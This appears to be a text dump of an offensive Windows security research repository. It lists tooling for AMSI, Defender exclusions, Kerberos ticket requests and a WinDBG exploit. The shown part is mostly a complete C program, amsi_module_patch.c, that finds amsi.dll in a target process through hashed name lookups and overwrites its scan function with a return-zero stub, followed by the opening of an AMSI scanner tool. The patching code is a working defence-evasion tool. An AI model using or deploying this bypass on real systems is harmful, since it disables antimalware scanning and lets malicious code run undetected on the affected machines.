Showing preview only (1,704K chars total). Download the full file or copy to clipboard to get everything.
Repository: am0nsec/wspe
Branch: master
Commit: 3cdbf9ddd6e2
Files: 94
Total size: 1.6 MB
Directory structure:
gitextract_uv3tnufw/
├── .gitignore
├── AMSI/
│ ├── amsi_module_patch.c
│ ├── amsi_scanner.c
│ └── structs.h
├── AppLocker/
│ └── List Policies/
│ ├── interfaces.h
│ └── main.c
├── CMakeLists.txt
├── CMakeSettings.json
├── Cryptography/
│ └── AES CNG/
│ ├── README.md
│ └── source/
│ ├── AES.cpp
│ ├── AES.h
│ ├── AESCrypt.sln
│ ├── AESCrypt.vcxproj
│ ├── AESCrypt.vcxproj.filters
│ ├── Base64.h
│ ├── Main.cpp
│ ├── Util.cpp
│ ├── Util.h
│ └── nthelpers.h
├── DIA/
│ ├── CMakeLists.txt
│ ├── inc/
│ │ ├── callback.h
│ │ ├── dirutil.h
│ │ ├── interface.h
│ │ └── msdia/
│ │ ├── idl/
│ │ │ └── dia2.idl
│ │ ├── include/
│ │ │ ├── cvconst.h
│ │ │ ├── dia2.h
│ │ │ └── diacreate.h
│ │ └── lib/
│ │ ├── amd64/
│ │ │ └── diaguids.lib
│ │ └── diaguids.lib
│ └── src/
│ ├── callback.c
│ ├── dirutil.c
│ ├── interface.c
│ └── main.c
├── Defender/
│ └── ExclusionLists/
│ ├── CMakeLists.txt
│ ├── inc/
│ │ └── defender.h
│ ├── main.c
│ └── src/
│ └── defender.c
├── Fusion/
│ ├── FindAssembly/
│ │ ├── FindAssembly.csproj
│ │ ├── FindAssembly.sln
│ │ ├── Fusion/
│ │ │ ├── GACUtil.cs
│ │ │ ├── IAssemblyCache.cs
│ │ │ ├── IAssemblyCacheItem.cs
│ │ │ ├── IAssemblyEnum.cs
│ │ │ └── IAssemblyName.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── Win32/
│ │ │ ├── Functions.cs
│ │ │ └── Macros.cs
│ │ └── app.config
│ └── ListAssemblies/
│ ├── gacutil.h
│ └── main.c
├── Kerberos/
│ ├── AskTGT/
│ │ ├── CMakeLists.txt
│ │ ├── kerberos.c
│ │ ├── kerberos.h
│ │ ├── main.c
│ │ ├── socket.c
│ │ └── socket.h
│ ├── GetTicket/
│ │ ├── CMakeLists.txt
│ │ └── src/
│ │ └── main.c
│ ├── List/
│ │ ├── CMakeLists.txt
│ │ └── src/
│ │ └── main.c
│ └── Purge/
│ ├── CMakeLists.txt
│ └── src/
│ └── main.c
├── LICENSE
├── Object Manager/
│ ├── List Handles/
│ │ ├── main.c
│ │ └── ntstructs.h
│ └── List Objects/
│ ├── main.c
│ └── ntstructs.h
├── Office/
│ └── Outlook/
│ ├── CMakeLists.txt
│ ├── inc/
│ │ └── outlook.h
│ └── src/
│ ├── main.c
│ └── outlook.c
├── Portable Executable/
│ └── parse_header.c
├── Power Management/
│ ├── README.md
│ ├── deus_somnum_pic.c
│ └── deus_somnum_user32.cpp
├── Process/
│ └── GetProcessEnvironmentBlock/
│ ├── GetProcessEnvironmentBlock/
│ │ ├── GetProcessEnvironmentBlock.csproj
│ │ └── Program.cs
│ └── GetProcessEnvironmentBlock.sln
├── README.md
├── RWX/
│ ├── JITCompilation/
│ │ ├── JITCompilation/
│ │ │ ├── JITCompilation.csproj
│ │ │ └── Program.cs
│ │ └── JITCompilation.sln
│ ├── MMF/
│ │ ├── MMF/
│ │ │ ├── MMF.csproj
│ │ │ └── Program.cs
│ │ └── MMF.sln
│ ├── PInvoke/
│ │ ├── PInvoke/
│ │ │ ├── PInvoke.csproj
│ │ │ └── Program.cs
│ │ └── PInvoke.sln
│ └── README.md
├── Secure Enclave/
│ └── VBS/
│ └── bsod.c
├── Task Scheduler/
│ ├── README.md
│ └── enumerate_tasks.cpp
└── WinDBG/
└── exploit86.js
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Coverlet is a free, cross platform Code Coverage Tool
coverage*[.json, .xml, .info]
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# Ionide (cross platform F# VS Code tools) working folder
.ionide/
# CMake
out/
================================================
FILE: AMSI/amsi_module_patch.c
================================================
/*+===================================================================
File: amsi_module_patch.c
Summary: Disable AMSI in a remote process.
Classes: N/A
Functions: N/A
Origin: https://github.com/am0nsec
##
Author: Paul Laine (@am0nsec)
===================================================================+*/
#include <Windows.h>
#include <stdio.h>
#include "structs.h"
#pragma comment(lib, "ntdll")
NTSTATUS NTAPI NtQueryInformationProcess(
__in HANDLE ProcessHandle,
__in DWORD ProcessInformationClass,
__out PVOID ProcessInformation,
__in ULONG ProcessInformationLength,
__out PULONG ReturnLength
);
/*--------------------------------------------------------------------
Macros.
--------------------------------------------------------------------*/
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define MODULE_FUNCTION_HASH 0xef9560b87e51d9fd
#define MODULE_NAME_HASH 0x7a41ff5c4c483108
/*--------------------------------------------------------------------
Function prototypes.
--------------------------------------------------------------------*/
PTEB RtlGetThreadEnvironmentBlock();
PPEB RtlGetProcessEnvironmentBlock();
BOOL GetRemoteProcessPeb(
__in PHANDLE pHandle,
__out PPEB pRemotePeb,
__out PPROCESS_BASIC_INFORMATION pBasicInformation
);
BOOL GetLoaderDataStructure(
__in PHANDLE pHandle,
__out PPEB_LDR_DATA pLdrData,
__out LPBYTE pPebBaseAddress
);
DWORD64 djb2(__in PBYTE str);
PVOID GetModuleBaseAddress(
__in PHANDLE pHandle,
__in PPEB_LDR_DATA pLdrData
);
BOOL GetModuleExportDirectory(
__in PHANDLE pHandle,
__out PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
__in PVOID pModuleBaseAddress
);
PVOID GetModuleFunctionAddress(
__in PHANDLE pHandle,
__in PIMAGE_EXPORT_DIRECTORY pExportDirectory,
__in PVOID pModuleBaseAddress
);
BOOL PatchModuleFunction(
__in PHANDLE pHandle,
__in PVOID pModuleFunctionAddress
);
/*--------------------------------------------------------------------
Global variables.
--------------------------------------------------------------------*/
PTEB g_pCurrentTeb = NULL;
PPEB g_pCurrentPeb = NULL;
INT wmain(INT argc, wchar_t* argv[]) {
wprintf(L"[>] AMSI Module Patch.\n");
wprintf(L"[>] Author: Paul Laine (@am0nsec).\n");
wprintf(L" ---------------------------------\n\n");
/*--------------------------------------------------------------------
Get process environment block and thread environment block.
--------------------------------------------------------------------*/
g_pCurrentTeb = RtlGetThreadEnvironmentBlock();
g_pCurrentPeb = RtlGetProcessEnvironmentBlock();
if (!g_pCurrentPeb || !g_pCurrentTeb || g_pCurrentPeb->OSMajorVersion != 0xA) {
wprintf(L"[-] This program is only supported by Windows 10 and greater.\n\n");
return 0x1;
}
/*--------------------------------------------------------------------
Get the PID of the targeted process.
--------------------------------------------------------------------*/
if (argc != 2) {
wprintf(L"[-] Invalid number of parameters.\n");
wprintf(L" Usage: %ws <process ID>\n\n", argv[0]);
return 0x1;
}
DWORD dwRemoteProcessId = _wtoi(argv[1]);
wprintf(L"[>] Target process ID: %d\n", dwRemoteProcessId);
/*--------------------------------------------------------------------
Get the HANDLE of the targeted process.
--------------------------------------------------------------------*/
wprintf(L"[>] Searching module base address ...\n");
HANDLE hRemoteProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, dwRemoteProcessId);
if (hRemoteProcess == INVALID_HANDLE_VALUE) {
wprintf(L"[-] Error while getting a HANDLE to the remote process: %d\n\n", g_pCurrentTeb->LastErrorValue);
return 0x01;
}
wprintf(L" - Process handle: 0x%016llx\n", (DWORD64)hRemoteProcess);
/*--------------------------------------------------------------------
Get the PEB of the remote process.
--------------------------------------------------------------------*/
PROCESS_BASIC_INFORMATION BasicInformation = { 0 };
PEB RemotePeb = { 0 };
if (!GetRemoteProcessPeb(&hRemoteProcess, &RemotePeb, &BasicInformation)) {
CloseHandle(hRemoteProcess);
return 0x01;
}
/*--------------------------------------------------------------------
Get the address of the PEB_LDR_DATA structure.
--------------------------------------------------------------------*/
PEB_LDR_DATA LdrData = { 0 };
if (!GetLoaderDataStructure(&hRemoteProcess, &LdrData, (LPBYTE)BasicInformation.PebBaseAddress)) {
CloseHandle(hRemoteProcess);
return 0x01;
}
/*--------------------------------------------------------------------
Search for the base address of the AMSI module.
--------------------------------------------------------------------*/
PVOID pModuleBaseAddress = GetModuleBaseAddress(&hRemoteProcess, &LdrData);
if (pModuleBaseAddress == NULL) {
wprintf(L"[-] Invalid module base address: %d\n\n", g_pCurrentTeb->LastErrorValue);
return 0x01;
}
wprintf(L" - Module base address: 0x%016llx\n", (DWORD64)pModuleBaseAddress);
wprintf(L"[+] Searching module base address ... OK\n\n");
/*--------------------------------------------------------------------
Get export directory structure of the module
--------------------------------------------------------------------*/
wprintf(L"[>] Searching function address ...\n");
IMAGE_EXPORT_DIRECTORY ExportDirectory = { 0 };
if (!GetModuleExportDirectory(&hRemoteProcess, &ExportDirectory, pModuleBaseAddress)) {
CloseHandle(hRemoteProcess);
return 0x01;
}
/*--------------------------------------------------------------------
Parse the export table of the module.
Re-implementation of the GetProcAddress function.
--------------------------------------------------------------------*/
PVOID pModuleFunctionAddress = GetModuleFunctionAddress(&hRemoteProcess, &ExportDirectory, pModuleBaseAddress);
if (pModuleFunctionAddress == NULL) {
CloseHandle(hRemoteProcess);
return 0x01;
}
wprintf(L" - Function address: 0x%016llx\n", (DWORD64)pModuleFunctionAddress);
wprintf(L"[+] Searching function address ... OK\n\n");
/*--------------------------------------------------------------------
Parse the export table of the module.
Re-implementation of the GetProcAddress function.
--------------------------------------------------------------------*/
if (!PatchModuleFunction(&hRemoteProcess, pModuleFunctionAddress)) {
CloseHandle(hRemoteProcess);
return 0x01;
}
/*--------------------------------------------------------------------
Cleanup and exit.
--------------------------------------------------------------------*/
if (hRemoteProcess != INVALID_HANDLE_VALUE)
CloseHandle(hRemoteProcess);
return 0x0;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: RtlGetThreadEnvironmentBlock
Summary: Get the TEB from the GS/FS register.
Args: N/A
Returns: PTEB
-----------------------------------------------------------------F-F*/
PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
return (PTEB)__readgsqword(0x30);
#else
return (PTEB)__readfsdword(0x16);
#endif
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: RtlGetProcessEnvironmentBlock
Summary: Get the PEB from the GS/FS register.
Args: N/A
Returns: PPEB
-----------------------------------------------------------------F-F*/
PPEB RtlGetProcessEnvironmentBlock() {
#if _WIN64
return (PPEB)__readgsqword(0x60);
#else
return (PPEB)__readfsdword(0x30);
#endif
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: GetRemoteProcessPeb
Summary: Get PEB from a remote process.
Args: PHANDLE pHandle
- Pointer to an handle of a remote process.
PPEB pRemotePeb
- Pointer to the PEB structure of the remote process.
PPROCESS_BASIC_INFORMATION pBasicInformation
- Pointer to a structure that contains information about
the remote process.
Returns: BOOL
-----------------------------------------------------------------F-F*/
BOOL GetRemoteProcessPeb(PHANDLE pHandle, PPEB pRemotePeb, PPROCESS_BASIC_INFORMATION pBasicInformation) {
ULONG lBytesWritten = 0;
NtQueryInformationProcess(*pHandle, 0, pBasicInformation, sizeof(PROCESS_BASIC_INFORMATION), &lBytesWritten);
if (lBytesWritten != sizeof(PROCESS_BASIC_INFORMATION)) {
wprintf(L"[-] Something went wrong will gathering remote process basic information: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
SIZE_T lBytesRead = 0;
ReadProcessMemory(*pHandle, pBasicInformation->PebBaseAddress, pRemotePeb, sizeof(PEB), &lBytesRead);
if (lBytesRead != sizeof(PEB)) {
wprintf(L"[-] Something went wrong will getting remote PEB: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
wprintf(L" - Process image base: 0x%016llx\n", (DWORD64)pRemotePeb->ImageBase);
return TRUE;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: GetLoaderDataStructure
Summary: Get the loader data structure from a the remote process.
Args: PHANDLE pHandle
- Pointer to an handle of a remote process.
PPEB_LDR_DATA pLdrData
- Pointer to the loader data structure from the remote
process.
LPBYTE pPebBaseAddress
- Base address of the PEB structure from the remote
process.
Returns: BOOL
-----------------------------------------------------------------F-F*/
BOOL GetLoaderDataStructure(PHANDLE pHandle, PPEB_LDR_DATA pLdrData, LPBYTE pPebBaseAddress) {
LPVOID pLdrDataAddress = NULL;
SIZE_T lBytesRead = 0;
#if _WIN64
ReadProcessMemory(*pHandle, (pPebBaseAddress + 0x18), &pLdrDataAddress, sizeof(PPEB_LDR_DATA), &lBytesRead);
#else
ReadProcessMemory(*pHandle, (pPebBaseAddress + 0x0c), &pLdrDataAddress, sizeof(PPEB_LDR_DATA), &lBytesWritten);
#endif
if (!pLdrDataAddress || lBytesRead != sizeof(PPEB_LDR_DATA)) {
wprintf(L"[-] Invalid loader data address returned: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
wprintf(L" - Loader data address: 0x%016llx\n", (DWORD64)pLdrDataAddress);
ReadProcessMemory(*pHandle, pLdrDataAddress, pLdrData, sizeof(PEB_LDR_DATA), &lBytesRead);
if (lBytesRead != sizeof(PEB_LDR_DATA)) {
wprintf(L"[-] Invalid loader data structure returned: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
return TRUE;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: djb2
Summary: Get the hash of a ASCII string.
Args: PBYTE str
- Pointer to an ASCII string to hash.
Returns: DWORD64
-----------------------------------------------------------------F-F*/
DWORD64 djb2(PBYTE str) {
DWORD64 dwHash = 0x77347734;
INT c;
while (c = *str++)
dwHash = ((dwHash << 0x5) + dwHash) + c;
return dwHash;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: GetModuleFunctionAddress
Summary: Parse all the LDR_DATA_TABLE_ENTRY structures of the
PEB_LDR_DATA structure of a remote process in order to find
the base address of module.
Args: PHANDLE pHandle
- Pointer to an handle of a remote process.
PPEB_LDR_DATA pLdrData
- Pointer to the loader data structure from the remote
process.
Returns: PVOID
-----------------------------------------------------------------F-F*/
PVOID GetModuleBaseAddress(PHANDLE pHandle, PPEB_LDR_DATA pLdrData) {
SIZE_T lBytesRead = 0;
PLIST_ENTRY pListEntry = (PLIST_ENTRY)((PBYTE)pLdrData->InMemoryOrderModuleList.Flink - 0x10);
PLIST_ENTRY pListEntryFirstElement = pListEntry;
PVOID pAddress = NULL;
do {
LDR_DATA_TABLE_ENTRY LdrDataEntry;
ReadProcessMemory(*pHandle, pListEntry, &LdrDataEntry, sizeof(LDR_DATA_TABLE_ENTRY), &lBytesRead);
if (lBytesRead != sizeof(LDR_DATA_TABLE_ENTRY)) {
wprintf(L"[-] Invalid loader data entry returned: %d\n\n", g_pCurrentTeb->LastErrorValue);
return NULL;
}
// Get the name of the entry
if (LdrDataEntry.DllBase) {
PWCHAR pLdrDataEntryName = HeapAlloc(g_pCurrentPeb->ProcessHeap, HEAP_ZERO_MEMORY, LdrDataEntry.BaseDllName.MaximumLength);
ReadProcessMemory(*pHandle, LdrDataEntry.BaseDllName.Buffer, pLdrDataEntryName, LdrDataEntry.BaseDllName.MaximumLength, NULL);
// Convert from Unicode to ASCII
INT size = WideCharToMultiByte(CP_ACP, 0, pLdrDataEntryName, LdrDataEntry.BaseDllName.MaximumLength, NULL, 0, NULL, NULL);
PBYTE pLdrDataEntryNameAscii = HeapAlloc(g_pCurrentPeb->ProcessHeap, 0, size + 1);
size = WideCharToMultiByte(CP_ACP, 0, pLdrDataEntryName, LdrDataEntry.BaseDllName.MaximumLength, pLdrDataEntryNameAscii, size, NULL, NULL);
// Check the name of the module
if (MODULE_NAME_HASH == djb2(pLdrDataEntryNameAscii)) {
pAddress = LdrDataEntry.DllBase;
}
HeapFree(g_pCurrentPeb->ProcessHeap, 0, pLdrDataEntryName);
HeapFree(g_pCurrentPeb->ProcessHeap, 0, pLdrDataEntryNameAscii);
pLdrDataEntryName = NULL;
pLdrDataEntryNameAscii = NULL;
}
if (pAddress != NULL)
return pAddress;
pListEntry = (PLIST_ENTRY)((PBYTE)LdrDataEntry.InMemoryOrderLinks.Flink - 0x10);
} while (pListEntry != pListEntryFirstElement);
return NULL;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: GetModuleExportDirectory
Summary: Parse the PE header of the module in order to get the
export directory structure of the module.
Args: PHANDLE pHandle
- Pointer to an handle of a remote process.
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory
- Pointer to the export directory structure of a remote
process.
VOID pModuleBaseAddress
- Pointer to the address of the module to patch.
Returns: BOOL
-----------------------------------------------------------------F-F*/
BOOL GetModuleExportDirectory(PHANDLE pHandle, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVOID pModuleBaseAddress) {
IMAGE_NT_HEADERS ModuleImageNtHeaders = { 0 };
IMAGE_DOS_HEADER ModuleImageDosHeader = { 0 };
SIZE_T lBytesRead = 0;
ReadProcessMemory(*pHandle, (LPCVOID)pModuleBaseAddress, &ModuleImageDosHeader, sizeof(IMAGE_DOS_HEADER), &lBytesRead);
if (ModuleImageDosHeader.e_magic != IMAGE_DOS_SIGNATURE || lBytesRead != sizeof(IMAGE_DOS_HEADER)) {
wprintf(L"[-] Invalid module DOS header: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
wprintf(L" - DOS Header: 0x%016llx\n", (DWORD64)pModuleBaseAddress);
LPCVOID lpImageDosHeadersAddress = ((PBYTE)pModuleBaseAddress + ModuleImageDosHeader.e_lfanew);
ReadProcessMemory(*pHandle, lpImageDosHeadersAddress, &ModuleImageNtHeaders, sizeof(IMAGE_NT_HEADERS), &lBytesRead);
if (ModuleImageNtHeaders.Signature != IMAGE_NT_SIGNATURE || lBytesRead != sizeof(IMAGE_NT_HEADERS)) {
wprintf(L"[-] Invalid module NT header: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
wprintf(L" - NT Headers: 0x%016llx\n", (DWORD64)lpImageDosHeadersAddress);
PIMAGE_DATA_DIRECTORY DataDirectory = ModuleImageNtHeaders.OptionalHeader.DataDirectory;
ReadProcessMemory(*pHandle, ((PBYTE)pModuleBaseAddress + DataDirectory[0].VirtualAddress), pImageExportDirectory, DataDirectory[0].Size, &lBytesRead);
if (lBytesRead != DataDirectory[0].Size) {
wprintf(L"[-] Invalid export directory returned: %d\n\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
wprintf(L" - Export directory: 0x%016llx\n", (DWORD64)((PBYTE)pModuleBaseAddress + DataDirectory[0].VirtualAddress));
return TRUE;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: GetModuleFunctionAddress
Summary: Parse the arrays in the export directory to find the
address of the function to patch.
Args: PHANDLE pHandle
- Pointer to an handle of a remote process.
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory
- Pointer to the export directory structure of a remote
process.
PVOID pModuleBaseAddress
- Pointer to the address of the module to patch.
Returns: PVOID
-----------------------------------------------------------------F-F*/
PVOID GetModuleFunctionAddress(PHANDLE pHandle, PIMAGE_EXPORT_DIRECTORY pExportDirectory, PVOID pModuleBaseAddress) {
PDWORD aAddressOfFunctions = (PDWORD)((PBYTE)pModuleBaseAddress + pExportDirectory->AddressOfFunctions);
PDWORD aAddressOfNames = (PDWORD)((PBYTE)pModuleBaseAddress + pExportDirectory->AddressOfNames);
PWORD aAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBaseAddress + pExportDirectory->AddressOfNameOrdinals);
SIZE_T lBytesRead = 0;
PVOID pFunctionAddress = NULL;
for (WORD cx = 0; cx < pExportDirectory->NumberOfNames; cx++) {
DWORD dwAddressOfNamesValue = 0;
ReadProcessMemory(*pHandle, aAddressOfNames + cx, &dwAddressOfNamesValue, sizeof(DWORD), NULL);
PBYTE pFunctionName = HeapAlloc(g_pCurrentPeb->ProcessHeap, HEAP_ZERO_MEMORY, MAX_PATH);
ReadProcessMemory(*pHandle, (PBYTE)pModuleBaseAddress + dwAddressOfNamesValue, pFunctionName, MAX_PATH, NULL);
if (MODULE_FUNCTION_HASH == djb2(pFunctionName)) {
WORD wFunctionOrdinal = 0;
ReadProcessMemory(*pHandle, aAddressOfNameOrdinales + cx, &wFunctionOrdinal, sizeof(WORD), &lBytesRead);
if (lBytesRead != sizeof(WORD)) {
wprintf(L"[-] Error while getting the ordinal of the function");
return NULL;
}
DWORD dwFunctionAddressOffset = 0;
ReadProcessMemory(*pHandle, aAddressOfFunctions + wFunctionOrdinal, &dwFunctionAddressOffset, sizeof(DWORD), &lBytesRead);
if (lBytesRead != sizeof(DWORD)) {
wprintf(L"[-] Error while getting the address of the function");
return NULL;
}
pFunctionAddress = (DWORD64)pModuleBaseAddress + dwFunctionAddressOffset;
}
HeapFree(g_pCurrentPeb->ProcessHeap, HEAP_ZERO_MEMORY, pFunctionName);
pFunctionName = NULL;
if (pFunctionAddress != NULL)
return pFunctionAddress;
}
return NULL;
}
/*F+F+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Function: PatchModuleFunction
Summary: Patch the AMSI module function of a remote process.
Args: PHANDLE pHandle
- Pointer to an handle of a remote process.
PVOID pModuleFunctionAddress
- Address of the module function to patch, in the remote
process.
Returns: BOOL
-----------------------------------------------------------------F-F*/
BOOL PatchModuleFunction(PHANDLE pHandle, PVOID lpModuleFunctionAddress) {
BYTE patch[] = { 0x31, 0xC0, 0xC3 };
SIZE_T lBytesWritten = 0;
wprintf(L"[>] Patching the module ...\n");
WriteProcessMemory(*pHandle, lpModuleFunctionAddress, (LPCVOID)&patch, (sizeof(BYTE) * 3), &lBytesWritten);
if (lBytesWritten != (sizeof(BYTE) * 3)) {
wprintf(L"[>] Error while patching the DLL in memory: %d\n", g_pCurrentTeb->LastErrorValue);
return FALSE;
}
wprintf(L"[+] Patching the module ... OK\n\n");
return TRUE;
}
================================================
FILE: AMSI/amsi_scanner.c
================================================
/*+===================================================================
File: amsi_scanner.c
Summary: Scan string, file or URL via AMSI.
Classes: N/A
Functions: N/A
Origin: https://github.com/am0nsec
##
Author: Paul Laine (@am0nsec)
===================================================================+*/
#pragma once
#include <Windows.h>
#include <amsi.h>
#include <stdio.h>
#pragma comment(lib, "amsi.lib")
/*--------------------------------------------------------------------
Function prototypes.
--------------------------------------------------------------------*/
BOOL GetStringLenght(_In_ LPWSTR szString, _Out_ PULONG plStringSize);
BOOL ScanString(_In_ LPWSTR* pszString, _Out_ AMSI_RESULT* pAmsiResult);
BOOL ScanFile(_In_ LPWSTR* pszFileName, _Out_ AMSI_RESULT* pAmsiResult);
BOOL ScanUrl(_In_ LPWSTR* pszUrl, _Out_ AMSI_RESULT* pAmsiResult);
VOID Cleanup();
/*--------------------------------------------------------------------
Global variables.
--------------------------------------------------------------------*/
HAMSICONTEXT g_hAmsiContext = NULL;
HAMSISESSION g_hAmsiSession = NULL;
LPCWSTR g_szApplicationName = L"AMSI Scanner v1.0";
HANDLE g_hProcessHeap = INVALID_HANDLE_VALUE;
INT wmain(INT argc, PWCHAR argv[]) {
wprintf(L"[>] Copyright (C) 2020 Paul Laine (@am0nsec)\n");
wprintf(L"[>] AMSI Scanner v1.0\n");
wprintf(L"[>] https://github.com/am0nsec/wspe\n");
wprintf(L" -----------------------------------------\n\n");
// Check arguments supplied by the user
if (argc < 3 || (argc >= 2 && wcscmp(argv[1], L"-h") == 0)) {
